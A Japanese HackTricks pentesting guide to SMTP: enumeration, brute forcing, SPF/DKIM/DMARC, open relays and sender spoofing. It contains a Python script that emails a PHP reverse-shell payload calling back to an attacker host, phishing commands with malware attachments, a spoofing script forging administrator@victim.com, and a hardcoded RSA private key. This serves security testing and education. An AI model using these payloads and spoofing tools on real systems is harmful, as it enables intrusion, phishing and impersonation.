37 KiB
25,465,587 - SMTPのペンテスト
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksのグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- **💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローしてください。
- ハッキングテクニックを共有するために、 HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
脆弱性評価とペネトレーションテストのための即座に利用可能なセットアップ。20以上のツールと機能を使用して、リコンからレポート作成まで、どこからでも完全なペンテストを実行します。私たちはペンテスターを置き換えるのではなく、彼らに時間を戻し、より深く掘り下げたり、シェルをポップしたり、楽しんだりするためのカスタムツール、検出、およびエクスプロイトモジュールを開発します。
{% embed url="https://pentest-tools.com/" %}
基本情報
Simple Mail Transfer Protocol (SMTP)は、電子メールの送受信に使用されるTCP/IPスイート内のプロトコルです。受信者側でメッセージをキューイングする際の制限により、SMTPはしばしばPOP3またはIMAPと併用されます。これらの追加プロトコルにより、ユーザーはサーバーメールボックスにメッセージを保存し、定期的にダウンロードすることができます。
実際には、電子メールプログラムが電子メールの送信にSMTPを使用し、受信にはPOP3またはIMAPを使用することが一般的です。Unixベースのシステムでは、電子メール用に最も頻繁に使用されるSMTPサーバーとしてsendmailがあります。商用パッケージであるSendmailにはPOP3サーバーが含まれています。さらに、Microsoft ExchangeはSMTPサーバーを提供し、POP3サポートを含めるオプションがあります。
デフォルトポート: 25,465(ssl),587(ssl)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
EMAIL ヘッダー
もし被害者にあなたにメールを送らせる機会があれば(たとえばウェブページのお問い合わせフォームを通じて)、それを行ってください。なぜなら、メールのヘッダーを見ることで被害者の内部トポロジーについて知ることができるからです。
また、SMTP サーバーからメールを受け取ることもできます。その際は、存在しないアドレスにメールを送信しようとする SMTP サーバーから NDN メールを攻撃者に送信させることができます。ただし、許可されたアドレスからメールを送信していること(SPF ポリシーを確認)と、NDN メッセージを受信できることを確認してください。
さらに、異なるコンテンツを送信してみると、X-Virus-Scanned: by av.domain.com
のようなヘッダーに興味深い情報が見つかるかもしれません。
EICAR テストファイルを送信するべきです。
AV を検出することで、既知の脆弱性を悪用することができるかもしれません。
基本的なアクション
バナー取得/基本的な接続
SMTP:
nc -vn <IP> 25
SMTPS:
SMTPS(Simple Mail Transfer Protocol Secure)は、SMTPのセキュアバージョンであり、SMTP over SSLまたはSMTP over TLSとも呼ばれます。SMTPSは、通信を暗号化するためにSSLまたはTLSプロトコルを使用し、メールの送信者と受信者の間でセキュアな通信を確立します。
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
組織のMXサーバーの検出
dig +short mx google.com
列挙
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
NTLM認証 - 情報漏洩
サーバーがNTLM認証(Windows)をサポートしている場合、機密情報(バージョン)を取得できます。詳細はこちら。
root@kali: telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM 334
NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
または、nmap プラグイン smtp-ntlm-info.nse
を使用してこれを自動化します。
内部サーバー名 - 情報漏洩
一部のSMTPサーバーは、送信者のアドレスを完全なアドレスなしでコマンド "MAIL FROM" が発行された場合に自動補完し、内部名を漏洩します。
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
250-TURN
250-SIZE 52428800
250-ETRN
250-PIPELINING
250-DSN
250-ENHANCEDSTATUSCODES
250-8bitmime
250-BINARYMIME
250-CHUNKING
250-VRFY
250 OK
MAIL FROM: me
250 2.1.0 me@PRODSERV01.somedomain.com....Sender OK
スニッフィング
パケットからポート25へのパスワードをスニッフィングできるかどうかをチェックします
認証ブルートフォース
ユーザー名ブルートフォース列挙
認証が常に必要とされるわけではありません
RCPT TO
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
MAIL FROM:example@domain.com
250 2.1.0 example@domain.com... Sender ok
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
VRFY
VRFY(Verify)コマンドは、SMTPサーバー上でユーザー名の存在を確認するために使用されます。攻撃者はこのコマンドを使用して、有効なユーザー名を特定し、次に他の攻撃手法を展開するための情報収集を行うことができます。
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 myhost Hello 18.28.38.48, pleased to meet you
VRFY root
250 Super-User root@myhost
VRFY blah
550 blah... User unknown
EXPN
EXP は、SMTP サーバー上のメーリングリストの展開を要求するために使用されるコマンドです。これにより、攻撃者はメーリングリストに含まれるすべてのメンバーのメールアドレスを取得することができます。EXP コマンドは一般的に無効化されていますが、有効な場合は慎重に使用する必要があります。
$ telnet 1.1.1.1 25
Trying 1.1.1.1...
Connected to 1.1.1.1.
Escape character is '^]'.
220 myhost ESMTP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 ed.williams@myhost
EXPN sshd
250 2.1.5 sshd privsep sshd@myhost
自動ツール
Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
脆弱性評価および侵入テストのための即座に利用可能なセットアップ。レコンからレポート作成まで、20以上のツールと機能を使用してどこからでも完全なペンテストを実行します。私たちはペンテスターを置き換えるのではなく、カスタムツール、検出およびエクスプロイトモジュールを開発して、彼らにより深く掘り下げる時間を与え、シェルをポップして楽しむ時間を提供します。
{% embed url="https://pentest-tools.com/" %}
DSNレポート
配信ステータス通知レポート:組織に無効なアドレス宛にメールを送信した場合、組織はそのアドレスが無効であることを通知し、あなたにメールを返送します。返送されたメールのヘッダには、レポートとやり取りしたメールサービスのIPアドレスやアンチウイルスソフトウェア情報などの機密情報が含まれています。
コマンド
Linuxコンソールからメールを送信
sendEmail -t to@domain.com -f from@attacker.com -s <ip smtp> -u "Important subject" -a /tmp/malware.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.
<phishing message>
swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197
Pythonを使用してメールを送信する
Pythonコードはこちら
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))
SMTPスマグリング
SMTPスマグリングの脆弱性により、すべてのSMTP保護をバイパスすることができました(保護に関する詳細については次のセクションを参照してください)。 SMTPスマグリングについての詳細は以下をチェックしてください:
{% content-ref url="smtp-smuggling.md" %} smtp-smuggling.md {% endcontent-ref %}
メールスプーフィング対策
組織は、SMTPメッセージのスプーフィングが容易であるため、SPF、DKIM、およびDMARCを使用して、自分の代わりに許可されていないメールを送信されることを防ぎます。
これらの対策の完全なガイドは、https://seanthegeek.net/459/demystifying-dmarc/で提供されています。
SPF
{% hint style="danger" %}
SPFは2014年に「非推奨」となりました。これは、_spf.domain.com
内のTXTレコードを作成する代わりに、同じ構文を使用してdomain.com
内に作成することを意味します。
さらに、以前のspfレコードを再利用するために、"v=spf1 include:_spf.google.com ~all"
のようなものをよく見つけることが一般的です。
{% endhint %}
Sender Policy Framework(SPF)は、メール転送エージェント(MTA)が、組織によって定義された認証されたメールサーバーのリストをクエリして、メールを送信するホストが認証されているかどうかを検証する仕組みです。このリストには、IPアドレス/範囲、ドメイン、および他のエンティティが含まれ、ドメイン名を代表してメールを送信することが許可されているさまざまな「メカニズム」がSPFレコードに含まれています。
メカニズム
Wikipediaより:
メカニズム | 説明 |
---|---|
ALL | 常に一致します。前のメカニズムで一致しなかったすべてのIPに対して-all のようにデフォルトの結果に使用されます。 |
A | ドメイン名に送信者のアドレスに解決できるアドレスレコード(AまたはAAAA)がある場合、一致します。 |
IP4 | 送信者が特定のIPv4アドレス範囲にある場合、一致します。 |
IP6 | 送信者が特定のIPv6アドレス範囲にある場合、一致します。 |
MX | ドメイン名に送信者のアドレスに解決するMXレコードがある場合、一致します(つまり、メールはドメインの受信メールサーバーの1つから送信されます)。 |
PTR | クライアントのアドレスのためのドメイン名(PTRレコード)が指定されたドメイン内にあり、そのドメイン名がクライアントのアドレスに解決される場合(フォワード確認逆引きDNS)、一致します。このメカニズムは非推奨であり、可能な限り避けるべきです。 |
EXISTS | 指定されたドメイン名がどのアドレスに解決されても一致します。これはほとんど使用されません。SPFマクロ言語とともに使用すると、DNSBLクエリなどのより複雑な一致が提供されます。 |
INCLUDE | 他のドメインのポリシーを参照します。そのドメインのポリシーが合格した場合、このメカニズムが合格します。ただし、含まれるポリシーが失敗した場合、処理は続行されます。別のドメインのポリシーに完全に委任するには、リダイレクト拡張機能を使用する必要があります。 |
REDIRECT | リダイレクトは、SPFポリシーをホストする別のドメイン名を指すポインタであり、複数のドメインが同じSPFポリシーを共有できるようにします。同じメールインフラストラクチャを共有する大量のドメインで作業する場合に便利です。 リダイレクトメカニズムで示されたドメインのSPFポリシーが使用されます。 |
また、メカニズムが一致した場合の処理方法を示す クオリファイアを識別することも可能です。デフォルトでは、クオリファイア "+"が使用されます(つまり、どのメカニズムが一致しても許可されることを意味します)。
通常、各SPFポリシーの最後に次のようなものがあることに注意してください:~allまたは**-all**。これは、送信者がどのSPFポリシーにも一致しない場合、メールを信頼できない(~)としてタグ付けするか、メールを拒否(-)する必要があることを示すために使用されます。
クオリファイア
ポリシー内の各メカニズムは、意図された結果を定義するために、次の4つのクオリファイアのいずれかで接頭辞を付けることができます:
+
: PASS結果に対応します。デフォルトでは、メカニズムはこのクオリファイアを想定しており、+mx
はmx
と同等です。?
: NEUTRAL結果を表し、特定のポリシーがない場合と同様に扱われます。~
: SOFTFAILを示し、NEUTRALとFAILの中間地点として機能します。この結果を満たすメールは通常受け入れられますが、適切にマークされます。-
: FAILを示し、メールを断固として拒否すべきであることを示します。
次の例では、google.comのSPFポリシーが示されています。最初のSPFポリシー内で異なるドメインからのSPFポリシーを含めることに注意してください:
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com. IN TXT
_spf.google.com. 235 IN TXT "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
dig txt _netblocks.google.com | grep spf
_netblocks.google.com. 1606 IN TXT "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
伝統的には、正しい/存在しないSPFレコードを持たないドメイン名をスプーフィングすることが可能でした。現在では、有効なSPFレコードのないドメインからの電子メールはおそらく自動的に拒否される/信頼されないとマークされるでしょう。
ドメインのSPFをチェックするには、https://www.kitterman.com/spf/validate.htmlのようなオンラインツールを使用できます。
DKIM(DomainKeys Identified Mail)
DKIMは、送信メールに署名を付けるために使用され、外部のメール転送エージェント(MTA)がDNSからドメインの公開鍵を取得して検証できるようにします。この公開鍵は、ドメインのTXTレコードに格納されています。この鍵にアクセスするには、セレクタとドメイン名の両方を知っている必要があります。
たとえば、鍵をリクエストするには、ドメイン名とセレクタが必要です。これらはメールヘッダーDKIM-Signature
内で見つけることができます。例:d=gmail.com;s=20120113
。
この情報を取得するためのコマンドは次のようになります:
dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
DMARC(Domain-based Message Authentication, Reporting & Conformance)
DMARCは、SPFおよびDKIMプロトコルを基にして電子メールのセキュリティを強化します。特定のドメインからのメールの取り扱いについてのポリシーを概説し、認証の失敗の取り扱い方法や電子メール処理アクションに関するレポートの送信先などを案内します。
DMARCレコードを取得するには、サブドメイン_dmarcをクエリする必要があります
# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com. 3600 IN TXT "v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"
# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"
# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
DMARC タグ
タグ名 | 目的 | サンプル |
---|---|---|
v | プロトコルバージョン | v=DMARC1 |
pct | フィルタリング対象のメッセージの割合 | pct=20 |
ruf | 法的報告用の報告 URI | ruf=mailto:authfail@example.com |
rua | 集計レポート用の報告 URI | rua=mailto:aggrep@example.com |
p | 組織ドメインのポリシー | p=quarantine |
sp | OD のサブドメインのポリシー | sp=reject |
adkim | DKIM の整合モード | adkim=s |
aspf | SPF の整合モード | aspf=r |
サブドメインについては?
こちら から。
送信元のメールアドレスに対して SPF レコードを持つ各サブドメインには個別の SPF レコードが必要です。
以下は元々 openspf.org に投稿されたもので、この種の情報には非常に役立つリソースでした。
デーモンの質問: サブドメインについてはどうですか?
pielovers.demon.co.uk からメールを受け取り、pielovers に SPF データがない場合、demon.co.uk の SPF をテストすべきですか? いいえ。Demon の各サブドメインは異なる顧客であり、各顧客には独自のポリシーがあるかもしれません。 Demon のポリシーがデフォルトですべての顧客に適用されるのは意味がありません。 Demon がそれを行いたい場合は、各サブドメインに SPF レコードを設定できます。
したがって、SPF パブリッシャーへのアドバイスは次のとおりです: 各 A レコードまたは MX レコードを持つサブドメインまたはホスト名に SPF レコードを追加する必要があります。
ワイルドカード A レコードまたは MX レコードを持つサイトは、次の形式のワイルドカード SPF レコードも持つ必要があります: * IN TXT "v=spf1 -all"
これは理にかなっています - サブドメインは異なる地理的位置にあり、非常に異なる SPF 定義を持っている可能性があります。
オープンリレー
電子メールを送信する際、スパムとしてフラグ付けされないようにすることは重要です。これは、受信者に信頼されるリレーサーバーを使用して実現されることがよくあります。ただし、一般的な課題は、管理者がどの IP レンジを許可するのが安全か完全に把握していない可能性があります。この理解の欠如は、セキュリティアセスメントで頻繁に特定されるリスクにつながる可能性があります。
特に潜在的な顧客や既存の顧客とのコミュニケーションに関する電子メール配信の問題を回避するために、一部の管理者が使用する回避策は、任意の IP アドレスからの接続を許可することです。これは、SMTP サーバーの mynetworks
パラメータをすべての IP アドレスを受け入れるように設定することで行われます。
mynetworks = 0.0.0.0/0
以下は、メールサーバーがオープンリレーであるかどうかをチェックするために一般的に使用されるnmap
ツールについてです。これには、このテストを行うために設計された特定のスクリプトが含まれています。nmap
を使用して、例えばIPが10.10.10.10のサーバーのポート25で詳細なスキャンを実行するコマンドは次の通りです:
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
ツール
- https://github.com/serain/mailspoof SPF および DMARC の設定ミスをチェックします
- https://pypi.org/project/checkdmarc/ 自動的に SPF および DMARC の設定を取得します
送信元偽装メール
またはツールを使用することもできます:
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
{% hint style="warning" %}
dkim pythonライブラリを使用している際にエラーが発生した場合は、以下のキーを使用しても構いません。
注意: これは、何らかの理由でopensslの秘密鍵がdkimによって解析できない場合に、クイックチェックを行うための一時的な修正です。
-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----
{% endhint %}
または、手動で行うこともできます:
{% tabs %} {% tab title="PHP" %}
# これは署名されていないメッセージを送信します
mail("your_email@gmail.com", "テスト件名!", "こんにちは!これはテストです", "From: administrator@victim.com");
{% endtab %}
{% tab title="Python" %}
# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py
import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]
# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")
# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()
# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()
# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()
# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)
{% endtab %} {% endtabs %}
詳細情報
これらの保護に関する詳細情報は、https://seanthegeek.net/459/demystifying-dmarc/ で見つけることができます。
その他のフィッシング指標
- ドメインの年齢
- IPアドレスを指すリンク
- リンク操作技術
- 疑わしい(一般的でない)添付ファイル
- 壊れた電子メールコンテンツ
- メールヘッダーと異なる値の使用
- 有効で信頼されたSSL証明書の存在
- ページのWebコンテンツフィルタリングサイトへの提出
SMTPを介した情報の持ち出し
SMTPを介してデータを送信できる場合は、こちらを参照してください。
設定ファイル
Postfix
通常、インストールされている場合、/etc/postfix/master.cf
には、例えば新しいメールがユーザーによって受信されたときに実行されるスクリプトが含まれています。 たとえば、flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}
という行は、ユーザーmarkが新しいメールを受信した場合に/etc/postfix/filtering
が実行されることを意味します。
その他の設定ファイル:
sendmail.cf
submit.cf
参考文献
- https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
- https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
HackTricks 自動コマンド
Protocol_Name: SMTP #Protocol Abbreviation if there is one.
Port_Number: 25,465,587 #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
https://book.hacktricks.xyz/pentesting/pentesting-smtp
Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25
Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V
Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
脆弱性評価およびペネトレーションテストのための即座に利用可能なセットアップ。レコンからレポート作成まで、20以上のツールと機能を使用してどこからでも完全なペンテストを実行します。私たちはペンテスターを置き換えるのではなく、カスタムツール、検出およびエクスプロイトモジュールを開発して、彼らにより深く掘り下げ、シェルをポップし、楽しむ時間を与えます。
{% embed url="https://pentest-tools.com/" %}
htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローする
- HackTricksおよびHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。